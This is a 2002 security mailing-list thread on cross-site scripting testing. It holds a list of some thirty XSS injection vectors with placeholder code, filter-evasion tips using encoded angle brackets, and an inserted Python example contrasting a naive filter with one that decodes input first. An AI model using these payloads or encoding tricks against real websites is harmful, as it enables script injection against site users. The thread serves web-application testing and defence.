WebApp Sec mailing list archives
Re: encoder
From: "Kevin Spett" <kspett () spidynamics com>
Date: Thu, 19 Dec 2002 17:42:26 -0500
You can also probably set up one of the many proxy-based tools (Spike, WebProxy, Achilles, etc) to do regex replacing for it automatically, or hack it in yourself if you're handy with code. WebInspect has tools to automatically do this stuff too, if you don't mind a commercial solution. (Free trial at http://www.spidynamics.com/)

Kevin Spett
SPI Labs
http://www.spidynamics.com/

----- Original Message -----
From: "N30" <n30_lists () hotmail com>
To: <webappsec () securityfocus com>
Sent: Thursday, December 19, 2002 5:10 PM
Subject: encoder

Hi group,

Any links/resources/scripts to convert ASCII characters to unicode / html encode / double decode? Testing web apps for XSS & SQL injections, a lot of times, sites filter out <> but forget to filter encoded versions of <>.

Thanks in advance
-N

----- Original Message -----
From: "Tomas" <tomasg () extra lt>
To: <webappsec () securityfocus com>
Sent: Monday, December 16, 2002 3:42 AM
Subject: Re: XSS Strings

Hi. Here are some more examples:

<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

Tomas

----- Original Message -----
From: <securityarchitect () hush com>
To: <webappsec () securityfocus com>
Sent: Monday, December 16, 2002 9:54 AM
Subject: XSS Strings

Does anyone have a good list of payloads that will cover the majority of the options ?
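The failure N30 describes, a filter that strips the literal characters but misses their encoded forms, shown as an added example that is not code from the thread: a naive filter beside one that canonicalizes (URL-decodes until stable, then decodes HTML entities) before checking. The function names, the decode-round bound and the sample strings are constructed for this illustration.

```python
"""Added example: a naive "<"/">" filter on the raw string, beside one that first
URL-decodes (repeatedly, to undo double encoding) and decodes HTML entities."""
import html
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # bound on nested URL encoding (%25 -> %, then %3C -> <)


def naive_filter(value: str) -> bool:
    """True if the raw string contains no literal angle brackets."""
    return "<" not in value and ">" not in value


def canonicalize(value: str) -> str:
    """Decode what a browser/server may decode before the value hits the page:
    URL-decode until the string stops changing, then decode HTML entities."""
    current = value
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    # html.unescape covers &lt;, &#60;, &#x3c; and entities lacking a semicolon
    return html.unescape(current)


def canonical_filter(value: str) -> bool:
    """True only if the *decoded* form contains no angle brackets."""
    decoded = canonicalize(value)
    return "<" not in decoded and ">" not in decoded


# Constructed sample inputs: the same tag in several encodings, plus benign text.
SAMPLES = {
    "plain": "<b>x</b>",
    "url": "%3Cb%3Ex%3C/b%3E",
    "double_url": "%253Cb%253Ex%253C/b%253E",
    "entity_dec": "&#60;b&#62;x&#60;/b&#62;",
    "entity_hex": "&#x3c;b&#x3e;x&#x3c;/b&#x3e;",
    "benign": "hello world",
}


def compare_filters() -> dict:
    """Return {sample name: (naive_passes, canonical_passes)}."""
    return {n: (naive_filter(v), canonical_filter(v)) for n, v in SAMPLES.items()}


if __name__ == "__main__":
    print(compare_filters())
```

Every encoded sample passes the naive filter and is rejected by the canonical one; only the benign string passes both.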
Current thread:
- XSS Strings securityarchitect (Dec 16)
- Re: XSS Strings Martin Eiszner (Dec 16)
- Re: XSS Strings Jeroen Latour (Dec 16)
- RE: XSS Strings Glyn (Dec 16)
- Re: XSS Strings Tomas (Dec 16)
- encoder N30 (Dec 19)
- Re: encoder Kevin Spett (Dec 19)
- encoder N30 (Dec 19)